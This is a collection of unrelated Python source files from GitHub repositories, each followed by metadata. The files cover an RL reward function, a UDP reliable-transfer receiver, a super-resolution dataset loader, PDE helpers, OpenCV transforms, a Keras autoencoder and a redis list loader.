                reward_reach=reach,
                reward_gripper_facing=-(pad_angle ** 2 * self.pad_dir_weight),#gripper_facing * self.pad_dir_weight, # 0.75 is good
                reward_gripper_center_deviate=gripper_center_deviate * 10,
                reward_gripper_qpos=gripper_qpos_at_0 * 10,
                gripper_ground_penalty=gripper_ground_penalty * 10,
            )
        else:
            # Phase 2: close the gripper and pull the box to its goal.
            res = dict(
                reward_reach=reach,
                reward_box_pull=-((box_s_next - goal) ** 2).sum(),
                reward_gripper_facing=-(pad_angle ** 2 * self.pad_dir_weight),
                reward_gripper_center_deviate=gripper_center_deviate * 10,
                reward_gripper_qpos=gripper_close * 10,
                gripper_ground_penalty=gripper_ground_penalty * 10,
            )
        # NOTE(review): leftover debug output at phase boundaries — consider
        # removing before long training runs.
        if self.t == 49 or self.t == 99:
            print("here")
            print(res)
        return res
def main():
    """Configure and launch RPG training for the Pick3Cube task."""
    trainer_config = dict(
        env=dict(
            TYPE="Pick3Cube",
            n_batches=1,
        ),
        actor=dict(
            not_func=True,
            a_head=dict(
                TYPE='Normal',
                linear=True,
                squash=False,
                std_mode='fix_no_grad',
                std_scale=0.1)
        ),
        # RPG
        rpg=dict(
            gd=True,
            optim=dict(
                accumulate_grad=5)
        ),
        z_dim=1, z_cont_dim=0,
        max_epochs=1000, n_batches=100,
        record_gif_per_epoch=1,
        device="cpu",
        # book keeping
        path="exp/aseq",
        log_date=True,
    )
    trainer = Trainer.parse(**trainer_config)
    # Register per-epoch diagnostics: GPU usage, trajectory dump, rollout gif.
    trainer.epoch_hooks.append(print_gpu_usage)
    trainer.epoch_hooks.append(save_traj)
    trainer.epoch_hooks.append(record_rollout)
    trainer.start()
if __name__ == "__main__":
    # Interactive debugging snippets (random stepping / viewer loop), kept
    # disabled:
    # import cv2
    # env = Pick3Cube()
    # obs = env.reset()
    # while True:
    #     env.step(torch.randn(1, env.action_space.shape[0]))
    #     env.get_reward(env.sim.state, torch.zeros(env.action_space.shape[0]), env.sim.state)
    #     cv2.imwrite("debug.png", env.render(text=""))
    #     input()
    # env.sim.viewer.create_window()
    # while not env.sim.viewer.window.closed:
    #     # env.step(torch.zeros(env.action_space.shape[0]))
    #     env.render()
    # Silence noisy DeprecationWarnings from the simulator stack before
    # launching training.
    import warnings
    warnings.filterwarnings("ignore", category=DeprecationWarning)
    main()
| haosulab/RPG | solver/envs/rigidbody3d/r3d_pick3cube.py | r3d_pick3cube.py | py | 7,681 | python | en | code | 18 | github-code | 13 |
70061790099 | import sys
from socket import *
import zlib
# There is no need for Bob to detect end of transmission and terminate. If you need to
# manually terminate it, press <Ctrl> + c.
#Algorithm planning
#Global variables are here and initialised
clientAddress = 0  # placeholder; replaced by the sender's address on the first datagram
serverPort = int(sys.argv[1]) #Get the arguments
bobSocket = socket(AF_INET,SOCK_DGRAM) #declare initialised UDP
#clientSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
bobSocket.bind(('localhost',serverPort))
expectedSeq = 0  # next in-order sequence number Bob expects from the sender
packets = []  # NOTE(review): unused in this file
#Socket functions ============================
# #compress the packet
# def compressPacket(message):
# return zlib.compress(message, level=-1)
# #deflate the packet as a string
# def deflatePacket(packet):
# return zlib.decompress(packet)
def calculateCheckSum(received:str):
    """Return the CRC-32 checksum (as an int) of the UTF-8 bytes of `received`."""
    return zlib.crc32(received.encode())
#returns true if it is corrupted
def isCorrupted(received:str, mine:str):
    """Return True when the received checksum string does not match ours.

    Both arguments are decimal checksum strings — the caller (checkPacket)
    already computes the CRC of the payload before calling.  The original
    implementation re-hashed `mine` and compared a str against the int
    returned by calculateCheckSum(); in Python 3 a str never equals an int,
    so every packet was reported corrupted.
    """
    return str(received) != str(mine)
#Creates a Packet that is already encoded
#Requires Checksum, size of message, length, sequence number
#Packet header: seq checksum length
#
# You are reminded again that each packet Alice or Bob sends should contain at most 64
# bytes of payload data (inclusive of user-defined header/trailer fields), or UnreliNET
# will drop it.
def makePacket(index:int):
    """Build an ACK packet b"<crc32> <seq>" for sequence number `index`."""
    body = str(index)
    digest = zlib.crc32(body.encode())
    return "{} {}".format(digest, body).encode()
#returns the header and the message (Left over)
def getHeader(message):
    """Parse a raw datagram into (checksum, sequence, more-flag, payload).

    Expected layout: "<checksum> <seq> <flag><SEP><payload>", where SEP is a
    three-character separator — presumably three spaces; TODO confirm
    against the sender's packet format.  Returns False when the packet is
    malformed or its CRC-32 does not match.
    """
    i =0
    message = message.decode()
    # Scan forward until the three-character separator is found; give up if
    # we would run past the end of the datagram.
    while(not message[i:i+3] == "   "):
        i = i +1
        if(i+3>len(message)):
            return False
    header = message [:i].split()
    if(len(header)< 3):
        return False
    checksum = header[0]
    # The CRC covers everything after "<checksum> " (seq, flag, separator
    # and payload) and is compared as a decimal string.
    calcChecksum = str(zlib.crc32(message[len(checksum) + 1:].encode()))
    if (checksum != calcChecksum):
        return False
    # try:
    #     tocheck = header[1]+ " "+ header[2] + " " + message[i+3:]
    #     if(checkPacket(header[0],int(header[1]),tocheck) and ( header[2]!= "Y" or header[2] !="N")):
    #         sendMessage(makePacket(expectedSeq))
    #         #print("Bad packet")
    #         return False
    # except ValueError:
    #     return False
    return header[0],header[1],header[2],message[i+3:]
#returns true if the packet is correct
#checks that message is uncorrupted
#checks that the sequence is the same as the next expected
#Assumptions: assume that message is the correct length already
def checkPacket(checksum, sequence:int, message):
    # NOTE(review): currently dead code — its only call site is commented
    # out inside getHeader().  `mine` handed to isCorrupted() is the
    # precomputed CRC *string* of `message`, and the ordering test reads the
    # module-global expectedSeq.
    return (not isCorrupted(checksum, str(calculateCheckSum(message)))) and sequence <= expectedSeq
# Chat functions ===============================
#ensure the message is sent
def sendMessage(encodedMSG):
    """Send the already-encoded packet to the last known sender address.

    Relies on the module globals bobSocket and clientAddress (set by
    receiveMessage / the main loop).
    """
    #print("Attempt send at BOB" , encodedMSG.decode())
    bobSocket.sendto(encodedMSG,clientAddress)
#Bob Side of receiving
#Throws timeout error or invalid packet
def receiveMessage():
    """Receive the sender's stream until a packet flagged "N" (no more data)
    arrives, ACKing each in-order packet and writing its payload to stdout.

    Mutates the module globals expectedSeq (next in-order sequence number)
    and clientAddress (learned from each incoming datagram).
    """
    #print("Attempt recieve at BOB")
    sentence = ""
    nextByte = "Y"
    global expectedSeq
    global clientAddress
    while(nextByte != "N"):
        modifiedMessage, clientAddress = bobSocket.recvfrom(64) #receive
        header = getHeader(modifiedMessage)
        # Malformed / corrupted packet: drop it and wait for a resend.
        if(not header):
            continue
        #print("Recieved exp", message)
        try:
            checksum, EXPsequence, byte, message = header
            int(EXPsequence)
        except ValueError:
            continue
        # Duplicate or out-of-order packet: re-ACK the sequence number we
        # are still waiting for so the sender can retransmit.
        if(int(EXPsequence) != expectedSeq): #check if recieve packet has been acked before
            sendMessage(makePacket(expectedSeq))
            #print("TResend ack")
            continue #move on to the next packet
        # In-order packet: advance the window, ACK, and emit the payload.
        nextByte = byte
        expectedSeq = expectedSeq + 1
        sendMessage(makePacket(expectedSeq))
        sys.stdout.write(message)
        # sentence = sentence + message
        #print(message)
        #print("The message is: " , message)
        #print("The sentence is ", sentence)
    #print("Recieved successfull")
#MAIN PROGRAM HERE+===============================
receiveMessage()
# sys.stdout.write(sentence)
while True: #loop
    #waits for something
    # Keep ACKing after the transfer so a sender that lost the final ACK can
    # terminate.  NOTE(review): this ACKs expectedSeq+1 rather than
    # expectedSeq — confirm against the sender's protocol.
    modifiedMessage, clientAddress = bobSocket.recvfrom(64) #receive
    sendMessage(makePacket(expectedSeq+1))
| Deunitato/CS2105_Assignments | meh/Bob.py | Bob.py | py | 4,334 | python | en | code | 0 | github-code | 13 |
def divide_errors(y_pred, y_test):
    """Group indices of misclassified samples by "<true>-<predicted>" pair.

    Returns a dict mapping e.g. "3-5" (true label 3, predicted 5) to the
    list of sample indices where that confusion occurred.

    Note: the original first line was garbled with a stray dataset-id
    prefix, which made the file a syntax error.
    """
    wrong_indices = {}
    for i, (pred, ans) in enumerate(zip(y_pred, y_test)):
        if pred != ans:
            # setdefault returns the (possibly new) list, so we can append
            # in the same expression.
            wrong_indices.setdefault(f"{ans}-{pred}", []).append(i)
    return wrong_indices
def count_pred_labels(y):  # count each row num in heatmap
    """Tally how many samples carry each digit label 0-9.

    Index i of the returned list holds the occurrence count of label i.
    """
    tally = [0 for _ in range(10)]  # index expresses a true label
    for label in y:
        tally[int(label)] += 1
    print("pred_labels", tally)  # debug
    return tally
def identify_frequent_combinations(y_pred, y_test, threshold_rate):
    """Return the confusion pairs whose error rate (errors over the number of
    samples with that true label) reaches ``threshold_rate``.

    Assumes single-digit labels: the true label is read from the first
    character of the "<true>-<pred>" key — TODO confirm labels stay in 0-9.
    """
    mistakes = divide_errors(y_pred, y_test)
    label_totals = count_pred_labels(y_test)
    frequent = {}
    for combo, idx_list in mistakes.items():
        true_label = int(combo[0])
        if len(idx_list) / label_totals[true_label] >= threshold_rate:
            frequent[combo] = idx_list
    return frequent
| Kumamoto-Hamachi/knn_projects | divide.py | divide.py | py | 939 | python | en | code | 1 | github-code | 13 |
44625095981 | import numpy as np
from torch.utils.data import Dataset
import os
from PIL import Image as Image
import random
import torch
def random_crop(lr, hr, size, scale):
    """Cut a random size×size patch from the LR image and the corresponding
    (size*scale)×(size*scale) patch from the HR image."""
    # Draw the horizontal offset first, then the vertical one — the order of
    # RNG consumption matters for reproducibility.
    left = random.randint(0, lr.shape[1] - size)
    top = random.randint(0, lr.shape[0] - size)
    right, bottom = left + size, top + size
    lr_patch = lr[top:bottom, left:right]
    hr_patch = hr[top * scale:bottom * scale, left * scale:right * scale]
    return lr_patch, hr_patch
def augment(lr, hr):
# random_vertical_flip
if random.random() < 0.5:
lr = lr[::-1, :, :].copy()
hr = hr[::-1, :, :].copy()
# random_rotate_90
if random.random() < 0.5:
lr = np.rot90(lr, axes=(1, 0)).copy()
hr = np.rot90(hr, axes=(1, 0)).copy()
# random_horizontal_flip
if random.random() < 0.5:
lr = lr[:, ::-1, :].copy()
hr = hr[:, ::-1, :].copy()
return lr, hr
def to_tensor(img):
    """Convert an HWC uint8 image array to a CHW float tensor scaled to [0, 1]."""
    chw = np.transpose(img, (2, 0, 1))
    tensor = torch.from_numpy(chw).float()
    return tensor / 255.0
def get_train_list(lr_path, hr_path):
    """Return alphabetically sorted full paths of the files inside the LR and
    HR training directories, as two parallel lists."""
    lr_files = [os.path.join(lr_path, str(name)) for name in sorted(os.listdir(lr_path))]
    hr_files = [os.path.join(hr_path, str(name)) for name in sorted(os.listdir(hr_path))]
    return lr_files, hr_files
def get_test_list(lr_path):
    """Return alphabetically sorted full paths of the files inside the LR
    test directory."""
    return [os.path.join(lr_path, str(name)) for name in sorted(os.listdir(lr_path))]
class TrainDataset(Dataset):
    """Paired LR/HR image dataset.

    When ``is_train`` is True, each item is randomly cropped to
    ``patch_size`` (LR side) and augmented with random flips/rotation;
    otherwise full images are returned.  Items are (lr_tensor, hr_tensor)
    CHW float tensors in [0, 1].
    """

    def __init__(self, lr_train_path, hr_train_path, patch_size, scale, is_train=True):
        super(TrainDataset, self).__init__()
        self.lr_train_path = lr_train_path
        self.hr_train_path = hr_train_path
        self.patch_size = patch_size
        self.scale = scale
        self.is_train = is_train
        self.lr_path_list, self.hr_path_list = get_train_list(lr_train_path, hr_train_path)

    def __getitem__(self, idx):
        lr_img = np.array(Image.open(self.lr_path_list[idx]).convert('RGB'))
        hr_img = np.array(Image.open(self.hr_path_list[idx]).convert('RGB'))  # HWC layout
        if self.is_train:
            lr_img, hr_img = random_crop(lr_img, hr_img, self.patch_size, self.scale)
            lr_img, hr_img = augment(lr_img, hr_img)
        return to_tensor(lr_img), to_tensor(hr_img)

    def __len__(self):
        return len(self.lr_path_list)

    def __str__(self):
        return 'custom_train_dataset'
class TestDataset(Dataset):
    """LR-only dataset for inference.

    Each item is ``(idx, lr_tensor, lr_path)`` so callers can map outputs
    back to their source files.
    """

    def __init__(self, lr_test_path):
        super(TestDataset, self).__init__()
        self.lr_path_list = get_test_list(lr_test_path)

    def __getitem__(self, idx):
        lr_path = self.lr_path_list[idx]
        lr_img = np.array(Image.open(lr_path).convert('RGB'))
        return idx, to_tensor(lr_img), lr_path

    def __len__(self):
        return len(self.lr_path_list)

    def __str__(self):
        return 'custom_test_dataset'
| bigbye/RDN-SISR | code/custom_datasets.py | custom_datasets.py | py | 3,002 | python | en | code | 1 | github-code | 13 |
28905282158 | #! /usr/bin/python
# -*- coding: utf-8 -*-
import re,string
#import data_structure
def Save(lineid, sub, dec, output_file):
    """Append a '<id>/dec:<predicate>,<case>:<arg>,...' line to output_file,
    skipping lines that are already present (exact duplicates).

    ``sub`` is a list of (case-marker, argument) pairs; "-" marks an
    unfilled argument slot.
    """
    new_line = str(lineid) + "/dec:" + dec
    for s in sub:
        # The original branched on s[1] == "-" but produced s[1] either way;
        # append the argument directly.
        new_line = new_line + "," + s[0] + ":" + s[1]
    new_line = new_line + "\n"
    # "a+" positions the stream at EOF, so seek(0) is required before
    # reading; the original skipped it, read an empty string, and therefore
    # never detected duplicates.  A plain substring test also avoids
    # re.findall() treating the line as a regex pattern (metacharacters in
    # the data would break it).
    with open(output_file, "a+") as f:
        f.seek(0)
        if new_line not in f.read():
            f.write(new_line)
def Ex_relates(clause_list,clause_num,clause,lineid,output_file):
    """Walk KNP parser output clause by clause, extract predicate/argument
    relations with regexes, and persist each one via Save().

    ``clause`` holds per-clause line counts used to slice ``clause_list``
    into ranges.  NOTE(review): ``clause_num`` is unused.
    """
    counter = 0
    #topic = []
    for value in clause:
        # Translate the running line-count into the [start_pos, end_pos]
        # range of this clause within clause_list.
        if counter == 0:
            start_pos = 1
            end_pos = value
        else:
            start_pos = end_pos + 1
            end_pos = end_pos + value
        counter += 1
        # From here, extract information within the clause range
        # (between the '*' boundary markers).
        # The extraction itself is done with regular expressions.
        for i in range(start_pos,end_pos + 1):
            sentence = clause_list[i]
            #print sentence
            # su1: the case-analysis result line; group(1) is the predicate.
            # su2: the (case-marker, argument) pairs of that predicate.
            su1 = re.search(r"格解析結果:([^\s/]*)(/[^\s/]*)*:[^\s/]*:",sentence)
            su2 = re.findall(r"[;;]?([^\s:;/]*)/[^\s/]/([^\s/]*)/[\w-]/[\w-]/[\w-];",sentence)
            # for s in su2:
            #     print s[0],s[1]
            if not su1 == None:
                sub = su2
                dec = su1.group(1) # predicate
                Save(lineid,sub,dec,output_file)
                #data = data_structure.info(sub,dec)
                #topic.append(data)
    return
| pauwau/workspace | knp_distance/text_to_frame/ex_relates.py | ex_relates.py | py | 1,748 | python | en | code | 0 | github-code | 13 |
613750536 | #!/usr/bin/env python3
#coding: utf8
import lib
import numpy as np
import matplotlib.pyplot as plt
def delta(x, x0, N=1):
    """Grid-only Dirac delta: N wherever x is (numerically) close to x0,
    zero elsewhere.  Only meaningful when x0 lies exactly on the grid."""
    mask = np.isclose(x, x0)
    return mask * N
class initialValues:
    """Container for the grid/time-step constants shared by the hopf and
    diffusion simulations, derived from the command-line arguments
    (argv[1]=length, argv[2]=grid points, argv[3]=time steps,
    argv[4]=time step, argv[5]=boundary type)."""

    def __init__(self, argv, eps=1e-2):
        length = float(argv[1])
        n_x = int(argv[2])
        dx = length / (n_x - 1)
        dt = float(argv[4])
        self.LENGTH = length
        self.N_X = n_x
        self.DELTA_X = dx
        self.N_T = int(argv[3])
        self.DELTA_T = dt
        # CFL-style ratios used by the different schemes.
        self.ALPHA_HOPF = dt / dx
        self.ALPHA_HOPF_EQ = dt / dx
        self.ALPHA_DIFFUSION = dt / dx**2
        self.BoundaryType = argv[5]
        self.xvec = np.linspace(0, length, n_x)
        # Gaussian bump initial condition for the Hopf equation.
        self.HopfFunc = np.exp(-(self.xvec - 0.8)**2 / 2 / 0.05**2)
        # Discrete delta spike at the middle grid point for diffusion.
        self.DiffFunc = delta(self.xvec, self.xvec[int(n_x / 2)], N=n_x - 1)
        #self.DiffStep = 0.5*np.ones_like(self.xvec) + \
        #        0.5*np.heaviside(self.xvec-0.5,1.0)
        # Smoothed step profile (arctan regularisation of width eps).
        self.DiffStep = 0.5 * np.ones_like(self.xvec) + \
            0.5 / np.pi * (np.pi / 2 + np.arctan((self.xvec - 0.5) / eps))
def fourier_rect(t, h=1.0, N=8):
    """Partial Fourier series (first N odd harmonics) of a rectangular wave
    with amplitude h and period 1."""
    total = np.zeros_like(t)
    for k in range(1, N + 1):
        odd = 2 * k - 1
        total += np.sin(odd * 2 * np.pi * t) / odd
    return total * 4 * h / np.pi
def many_steps(t, h=1.0, N=8):
    """Staircase approximation of a linear ramp from ~0 to h over the span
    of t, built from N equal steps."""
    width = (t.max() - t.min()) / N
    height = h / N
    # Start at the first step's height, then add one step at each threshold.
    profile = np.ones_like(t) * height
    for step in range(1, N):
        profile += np.heaviside(t - step * width, 0.5) * height
    return profile
def ran_profile(t,h=1.0,N=2):
'''
return a median-filtered random profile.
'''
import scipy.signal as sc_sig
filtnum = int(len(t)/N/2)*2+1
result = sc_sig.medfilt(np.random.rand(len(t)),filtnum)
return result*h
def make_bc(matrix, which):
    """Apply boundary conditions to the PDE update matrix in place.

    Supported values of ``which``:
      * ``'periodic'``   -- couple the first and last grid points,
      * ``'reflecting'`` -- double the off-diagonal entries at both ends,
      * ``'absorbing'``  -- leave the matrix untouched.

    Raises ``ValueError`` for any other option.  Scheme as presented in
    the assignment slides.
    """
    rows, cols = matrix.shape
    if which == 'periodic':
        matrix[rows - 1][0] = matrix[0][1]
        matrix[0][cols - 1] = matrix[1][0]
    elif which == 'reflecting':
        matrix[0][1] *= 2
        matrix[rows - 1][cols - 2] *= 2
    elif which == 'absorbing':
        pass
    else:
        print('ERROR: No such option for the type of the boundary condition.')
        # technically not the correct error, but too lazy for custom handlers.
        raise ValueError
    return matrix
class simulation:
    '''
    Thin wrapper around a single simulation run.  Stores the chosen scheme
    (looked up from ``table`` by the key ``which``), the shared
    ``initialValues`` object and -- after ``simulate`` -- the result,
    plus a few matplotlib plotting helpers.  (Originally intended to
    gather all simulation types, now mostly storage for results.)
    '''
    def __init__(self, init, table, which):
        # table maps scheme names to callables f(initial, initialValues, const)
        self.simfun = table[which]
        self.initialValues = init
    def simulate(self, initial, const=1.0):
        # Run the stored scheme and keep input/constant/result for plotting.
        self.initial = initial
        self.const = const
        self.result = self.simfun(initial,self.initialValues,const)
    def plot_init(self,label='initial',plot_default=True):
        # Open a fresh figure; optionally draw the initial condition.
        self.fig = plt.figure(figsize=(6,4))
        self.ax = self.fig.add_subplot(111)
        if plot_default:
            self.ax.plot(self.initialValues.xvec,self.initial,label=label)
    def plot(self,ax,label):
        # Draw the result onto an externally supplied axis.
        ax.plot(self.initialValues.xvec,self.result,label=label)
    def plot_final(self,label,title):
        # Draw the result into the figure from plot_init and decorate it.
        self.ax.plot(self.initialValues.xvec,self.result,label=label)
        self.ax.set_xlabel('$x$')
        self.ax.set_ylabel('$u(x,t)$')
        self.ax.grid()
        self.ax.set_title(title)
        self.ax.legend()
        self.fig.tight_layout()
| alcubierre-drive/NTNU-TFY4235-2018 | Assignments/PartialDifferentialEquations/helpers.py | helpers.py | py | 3,942 | python | en | code | 0 | github-code | 13 |
import argparse
import json
import os.path
import sys

import cv2
import numpy as np
import rospkg
class mapDetails:
    """Interactive annotation tool for a store occupancy map.

    Loads ``map.pgm`` for the given store/map (resolved through the ROS
    ``storeplanner`` package), lets the operator draw shelf rectangles and
    double-click capture stops in OpenCV windows, and writes the results
    to JSON files under ``models/<store>/details/``.

    Written for Python 2 (uses ``raw_input``).
    """
    def __init__(self, args):
        # args: dict with 'store' and 'map' keys (see main()).
        self.shelves = list()
        self.shelves_h = list()
        self.capture_stops = list()
        rospack = rospkg.RosPack()
        base_path = rospack.get_path('storeplanner')
        map_filename = base_path + '/maps/' + args['store'] + '/' + args['map'] + '/map.pgm'
        if not os.path.exists(map_filename):
            print('Could not find map file.\nCheck file path.')
            # requires a module-level ``import sys``
            sys.exit(1)
        self.details_path = base_path + '/models/' + args['store'] + '/details/'
        if not os.path.exists(self.details_path):
            os.makedirs(self.details_path)
        self.img = cv2.imread(map_filename,cv2.IMREAD_COLOR)
    def run(self):
        """Main interactive loop: optionally select shelves (with heights),
        then optionally pick capture stops; each selection is saved to JSON."""
        ans = raw_input("Do you want to select the shelves? [y/n]\n")
        if ans == 'y' or ans == 'yes':
            cv2.namedWindow("Shelves selector",cv2.WINDOW_NORMAL)
            cv2.resizeWindow("Shelves selector", self.img.shape[1], self.img.shape[0])
            self.shelves = cv2.selectROIs("Shelves selector",self.img)
            cv2.destroyWindow("Shelves selector")
            ans2 = raw_input("Do you want to give shelves height? (default 2.0 meters for all) [y/n]\n")
            if ans2 == 'y' or ans2 == 'yes':
                self.shelves_h = self.calc_shelves_height()
            else:
                # One default 2.0 m height per selected shelf.
                self.shelves_h = [2.0] * len(self.shelves)
            self.save_shelves()
        #the capture stops should be given to the robot as it will do the inventary
        ans = raw_input("Do you want to select the capture stops? [y/n]\n")
        if ans == 'y' or ans == 'yes':
            cv2.namedWindow("Capture Stops selector",cv2.WINDOW_NORMAL)
            cv2.resizeWindow("Capture Stops selector", self.img.shape[1], self.img.shape[0])
            cv2.setMouseCallback("Capture Stops selector",self.mouse_callback)
            while(True):
                cv2.imshow("Capture Stops selector",self.img)
                k = cv2.waitKey() & 0xFF
                if k == 27: #esc
                    break
            cv2.destroyWindow("Capture Stops selector")
            self.save_capture_stops()
    def calc_shelves_height(self):
        """Highlight each selected shelf in turn and ask the operator for
        its height (metres).  Returns one float per shelf."""
        shelves_h = list()
        for shelf in self.shelves:
            temp_img = self.img.copy()
            (x, y, w, h) = shelf
            cv2.rectangle(temp_img,(x,y),(x + w,y + h),(0,0,255),2)
            cv2.namedWindow("Shelf Height calculator",cv2.WINDOW_NORMAL)
            cv2.resizeWindow("Shelf Height calculator", int(self.img.shape[1]/2), int(self.img.shape[0]/2))
            cv2.imshow("Shelf Height calculator",temp_img)
            cv2.waitKey(300)
            height = raw_input("Enter height for this shelf: ")
            shelves_h.append(float(height))
        cv2.destroyWindow("Shelf Height calculator")
        return shelves_h
    def save_shelves(self):
        """Write the selected shelf rectangles (and their heights, stored in
        the ``z`` field) to ``shelves.json``."""
        filename = self.details_path + 'shelves.json'
        shelf_cnt = 0
        data = {}
        data['shelves'] = []
        for shelf in self.shelves:
            shelf_cnt = shelf_cnt + 1
            (x, y, w, h) = shelf
            data['shelves'].append({
                'id': shelf_cnt,
                'x': int(x),
                'y': int(y),
                'z': float(self.shelves_h[shelf_cnt-1]),
                'w': int(w),
                'h': int(h)
            })
        with open(filename, 'w') as outfile:
            json.dump(data, outfile)
    def save_capture_stops(self):
        """Write the clicked capture-stop pixel coordinates to
        ``capture_stops.json``."""
        filename = self.details_path + 'capture_stops.json'
        stop_cnt = 0
        data = {}
        data['capture_stops'] = []
        for stop in self.capture_stops:
            stop_cnt = stop_cnt + 1
            (x, y) = stop
            data['capture_stops'].append({
                'id': stop_cnt,
                'x': int(x),
                'y': int(y)
            })
        with open(filename, 'w') as outfile:
            json.dump(data, outfile)
    def mouse_callback(self, event, x, y, flags, param):
        """On double left-click: mark the point on the image and record it."""
        if event == cv2.EVENT_LBUTTONDBLCLK:
            self.img = cv2.circle(self.img,(x,y),3,(0,0,255),-1)
            cv2.imshow("Capture Stops selector",self.img)
            self.capture_stops.append((x,y))
def main():
    """Parse the command line and run the interactive map annotation tool."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--store', type=str, default='store_2', help='store name / folder')
    parser.add_argument('--map', type=str, default='blender_map', help='map source / folder')
    parsed = parser.parse_args()
    tool = mapDetails(vars(parsed))
    tool.run()


if __name__ == '__main__':
    main()
| vrai-group/storeplanner | scripts/map_details.py | map_details.py | py | 4,227 | python | en | code | 0 | github-code | 13 |
36115388685 | import cv2
import numpy as np
def translate(img, translation, target_size=None):
    '''
    Translates an image by a particular amount.
    translation: (x, y) shift in pixels
    target_size: (w, h) of the output; defaults to the input size
    '''
    dx, dy = translation
    matrix = np.float32([[1, 0, dx],
                         [0, 1, dy]])
    return _warp_affine(img, matrix, target_size)
def rotate(img, theta):
    '''
    Rotates an image from its center. Adjust the size of the output image so that rotated
    image is fully contained inside it.

    theta: angle in the units cv2.getRotationMatrix2D expects
        (degrees, counter-clockwise).

    Steps
    - Estimate the size of the bounding box for the rotated image.
    - Locate the center of the target image
    - Rotate the image about its center
    - Move its center to the target image center
    '''
    h, w = img.shape[:2]
    center = w//2, h//2
    angle = theta
    scale = 1
    rotation_matrix = cv2.getRotationMatrix2D(center, angle, scale)
    # get the cosine value (|cos| of the rotation, top-left matrix entry)
    c = np.abs(rotation_matrix[0, 0])
    # get the sine value
    s = np.abs(rotation_matrix[0, 1])
    # compute the size of final image: bounding box of the rotated rectangle
    target_width = int((h * s) + (w * c))
    target_height = int((h * c) + (w * s))
    target_size = (target_width, target_height)
    # we need to translate the image to the new center after we rotate.
    target_center = target_width / 2, target_height / 2
    center_translation = np.subtract(target_center, center)
    tx, ty = center_translation
    # incorporate this translation to the rotation matrix (last column)
    rotation_matrix[0, 2] += tx
    rotation_matrix[1, 2] += ty
    return _warp_affine(img, rotation_matrix, target_size)
def _warp_affine(img, warp_matrix, target_size=None):
    """Apply an affine warp; output size defaults to the input size.

    target_size is (w, h), matching cv2.warpAffine's dsize convention.
    """
    rows, cols = img.shape[:2]
    if target_size:
        cols, rows = target_size
    return cv2.warpAffine(img, warp_matrix, (cols, rows))
| carnotresearch/cr-vision | src/cr/vision/geom/projective2d_actions.py | projective2d_actions.py | py | 1,825 | python | en | code | 2 | github-code | 13 |
10006307763 | #!/usr/bin/python2
'''
DAVID LETTIER
(C) 2016.
http://www.lettier.com/
Slackotron
'''
import sys
import os
import subprocess
import signal
import time
# Activate the virtualenv that lives one directory up (Python 2 execfile).
execfile(
  '../bin/activate_this.py',
  dict(__file__='../bin/activate_this.py')
)
# Give the child process this interpreter's module search path.
ENV = os.environ.copy()
ENV['PYTHONPATH'] = ":".join(sys.path)
# Launch the bot as a child process (argument list, no shell).
SLACKTRON_PROCESS = subprocess.Popen(
  ['python', 'src/slackotron.py'],
  shell=False,
  env=ENV
)
# Babysit the child: poll once a second until it exits.  A Ctrl-C here is
# forwarded to the child as SIGINT so it can shut down cleanly.
while SLACKTRON_PROCESS.poll() is None:
  try:
    time.sleep(1)
  except KeyboardInterrupt:
    SLACKTRON_PROCESS.send_signal(signal.SIGINT)
    time.sleep(1)
| lettier/slackotron | run.py | run.py | py | 580 | python | en | code | 16 | github-code | 13 |
30918365173 | # https://gist.github.com/NikolayOskolkov/277d65621267658e71d06eb59b577e44#file-autoencoderciteseq-py
# Input Layer
# NOTE(review): Keras snippet (from the linked gist).  X_scRNAseq,
# X_scProteomics, Input, Dense, concatenate and Model must be defined /
# imported by the surrounding notebook -- they are not defined here.
ncol_scRNAseq = X_scRNAseq.shape[1]
input_dim_scRNAseq = Input(shape = (ncol_scRNAseq, ), name = "scRNAseq")
ncol_scProteomics = X_scProteomics.shape[1]
input_dim_scProteomics = Input(shape = (ncol_scProteomics, ), name = "scProteomics")

# Dimensions of Encoder for each OMIC
encoding_dim_scRNAseq = 50
encoding_dim_scProteomics = 10

# Encoder layer for each OMIC (linear activations -> PCA-like embedding)
encoded_scRNAseq = Dense(encoding_dim_scRNAseq, activation = 'linear',
                         name = "Encoder_scRNAseq")(input_dim_scRNAseq)
encoded_scProteomics = Dense(encoding_dim_scProteomics, activation = 'linear',
                             name = "Encoder_scProteomics")(input_dim_scProteomics)

# Merging Encoder layers from different OMICs
merge = concatenate([encoded_scRNAseq, encoded_scProteomics])

# Bottleneck compression (shared latent representation of both OMICs)
bottleneck = Dense(50, kernel_initializer = 'uniform', activation = 'linear',
                   name = "Bottleneck")(merge)

#Inverse merging
merge_inverse = Dense(encoding_dim_scRNAseq + encoding_dim_scProteomics,
                      activation = 'elu', name = "Concatenate_Inverse")(bottleneck)

# Decoder layer for each OMIC
decoded_scRNAseq = Dense(ncol_scRNAseq, activation = 'sigmoid',
                         name = "Decoder_scRNAseq")(merge_inverse)
decoded_scProteomics = Dense(ncol_scProteomics, activation = 'sigmoid',
                             name = "Decoder_scProteomics")(merge_inverse)

# Combining Encoder and Decoder into an Autoencoder model
# NOTE(review): input=/output= are old Keras 1.x-style keyword names;
# current Keras expects inputs=/outputs= -- confirm against the Keras
# version in use.
autoencoder = Model(input = [input_dim_scRNAseq, input_dim_scProteomics],
                    output = [decoded_scRNAseq, decoded_scProteomics])

# Compile Autoencoder: one MSE reconstruction loss per modality
autoencoder.compile(optimizer = 'adam',
                    loss={'Decoder_scRNAseq': 'mean_squared_error',
                          'Decoder_scProteomics': 'mean_squared_error'})
autoencoder.summary()
| zkxshg/Test_of_machine_learning | cite_AutoencoderCITEseq.py | cite_AutoencoderCITEseq.py | py | 2,012 | python | en | code | 0 | github-code | 13 |
19602662290 | import json
from rediscluster import RedisCluster
import redis
import os
#rc = RedisCluster(host=os.getenv('REDIS'), port=6379, decode_responses=True)
rc = redis.Redis(host=os.getenv('REDIS'), port=6379, decode_responses=True)
def initExclude():
    """Load the default exclude lists from disk and store them in redis.

    Reads ``exclude/exclude.json`` and, for every known list, replaces the
    redis list of the same name with the file's entries.

    Fixes over the previous version: the file handle is now closed even if
    ``json.load`` or a redis call raises (``with`` statement), and the five
    copy-pasted delete/lpush pairs are collapsed into one loop.
    """
    with open('exclude/exclude.json') as f:
        data = json.load(f)
    # Replace each redis list: drop the old key, then push the new values.
    for key in ("sites", "maildomain", "skipEnds", "emails", "free"):
        rc.delete(key)
        values = data[key]
        # lpush with zero values would raise, so skip empty lists.
        if values:
            rc.lpush(key, *values)
